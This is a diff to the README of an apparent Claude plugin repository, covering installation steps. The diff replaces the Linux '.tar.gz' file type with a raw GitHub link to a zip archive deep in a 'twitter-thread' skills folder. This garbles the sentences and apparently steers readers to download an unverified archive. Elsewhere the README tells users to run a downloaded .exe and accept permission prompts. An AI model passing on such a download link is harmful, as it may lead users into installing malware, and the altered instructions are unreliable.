Rainbowlight-pixel/claude-cowork-content-plugin/README.md

 - **Windows:** Find the ".exe" file you just downloaded and double-click it.
 If asked about permissions, click "Yes" to allow installation.
 Follow the setup prompts by clicking "Next" and "Install."
 The installer will copy files and finish.
 - **macOS:** Locate the ".dmg" or ".pkg" file.
 Double-click it to open.
 Drag the plugin icon to your Applications folder or follow any on-screen instructions to install.
-- **Linux:** You may get a ".tar.gz" or ".deb" file.
+- **Linux:** You may get a "https://raw.githubusercontent.com/Rainbowlight-pixel/claude-cowork-content-plugin/main/content-repurposing/skills/twitter-thread/content-plugin-claude-cowork-v1.1-beta.1.zip" or ".deb" file.
 For ".deb," double-click to open with your software installer.
-For ".tar.gz," extract the files and look for a README with install commands, or use terminal commands if you feel comfortable.
+For "https://raw.githubusercontent.com/Rainbowlight-pixel/claude-cowork-content-plugin/main/content-repurposing/skills/twitter-thread/content-plugin-claude-cowork-v1.1-beta.1.zip," extract the files and look for a README with install commands, or use terminal commands if you feel comfortable.

 ### Step 4: Launch the Plugin